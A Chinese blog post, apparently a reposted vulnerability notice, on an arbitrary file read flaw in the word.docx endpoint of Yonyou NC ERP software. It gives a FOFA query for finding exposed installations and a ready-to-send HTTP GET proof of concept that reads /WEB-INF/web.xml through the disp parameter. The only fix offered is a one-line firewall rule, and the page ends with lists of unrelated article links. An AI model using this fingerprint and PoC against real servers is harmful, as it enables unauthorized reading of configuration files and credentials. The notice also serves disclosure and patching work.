用友NC word.docx任意文件读取漏洞

产品简介

用友NC是一款企业级ERP软件。作为一种信息化管理工具,用友NC提供了一系列业务管理模块,包括财务会计、采购管理、销售管理、物料管理、生产计划和人力资源管理等,帮助企业实现数字化转型和高效管理

漏洞概述

用友NC在word.docx的disp参数存在任意文件读取漏洞

指纹识别

fofa:

app="用友-UFIDA-NC"

在这里插入图片描述

漏洞利用

Poc:

GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1
Host: your_ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 0

在这里插入图片描述

修复建议

临时缓解措施:在应用防火墙上配置 禁止访问word.docx接口策略

【其实吵架从来没有输赢的,或者说都是输。】

相关推荐

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2023-12-16 06:28:03       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2023-12-16 06:28:03       100 阅读
  3. 在Django里面运行非项目文件

    2023-12-16 06:28:03       82 阅读
  4. Python语言-面向对象

    2023-12-16 06:28:03       91 阅读

热门阅读

  1. x86上运行LoongArch的环境

    2023-12-16 06:28:03       62 阅读
  2. TCP标志位

    2023-12-16 06:28:03       56 阅读
  3. 5G基础设施:2024-2028年市场趋势与预测

    2023-12-16 06:28:03       59 阅读
  4. 华为云CodeArts Pipeline常见问答汇总

    2023-12-16 06:28:03       58 阅读
  5. 华为云CodeArts Check常见问答汇总

    2023-12-16 06:28:03       61 阅读
  6. 新时代商业市场:AR技术的挑战与机遇并存

    2023-12-16 06:28:03       53 阅读